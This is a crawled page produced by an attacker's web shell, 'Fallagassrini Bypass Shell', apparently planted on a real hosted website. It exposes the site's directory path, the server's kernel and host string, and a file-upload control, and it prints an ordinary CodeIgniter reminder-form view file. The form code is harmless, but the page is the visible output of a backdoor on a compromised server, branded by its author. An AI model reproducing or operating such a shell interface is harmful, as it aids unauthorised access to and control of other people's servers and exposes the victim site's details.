? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/savoyglobal.net/drafthr/system/application/views/Settings/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/savoyglobal.net/drafthr/system/application/views/Settings/addreminder.php

<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');?> 
<div class="select-bar">
<label>
    <img src="<?=base_url()?>/assets/images/backbutton.png" title="Back" class="clickimage"  onclick="viewremind('1','remind_name','')" alt="Back" align = "center" width="25" height="25"  /></label>

</div>

<script type="text/javascript">

jQuery(document).ready(function ()
{
	$('.one').datepick({dateFormat: 'dd-mm-yyyy'});
});
</script>


<?php
 $attributes = array('id' => 'customForm');
 echo form_open('',$attributes);
 ?>
<fieldset>
        <legend>Add New Reminder</legend>
        <table>
            <tr>
                <td>
                    <label  for="remindname">Subject</label>
                </td>
                <td height="55px">
                    <input type="text" name="remind-name" id="remind-name"/><br/>
                    <span id="remind-nameInfo" class="red_bold">*</span>
                </td>
            </tr>

            <tr>
                <td>
                     <label> Reminder Date</label>
                </td>
                <td>
                     <input class="one" readonly="readonly"  id="inputDate" name="dateRem" value="<?php echo date("d-m-Y"); ?>"/>
                </td>
            </tr>
	    
	     <tr>
                <td>
                     <label> Remind Before</label>
                </td>
                <td>
                     <input type="text" id="numbefore"  name="numbefore"/> days
                </td>
            </tr>
	     
            <tr>
                <td>
                    <label  for="description"> Description</label>
                </td>
                <td>
                    <textarea cols="20" rows="5" id="description"></textarea> <span id="descriptionInfo" class="red_bold">*</span>
                </td>
            </tr>
            <tr>
                <td></td>
                <td>
                    <button type="button" name="remind-save"  onclick="return converttodate('inputDate'),Insert_Reminder_details();" id="remind-save"> Add Reminder </button>
                </td>
            </tr>
        </table>
</fieldset>
<?php
echo form_close();
?>
<div id="resultdiv" style="display: none"></div>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net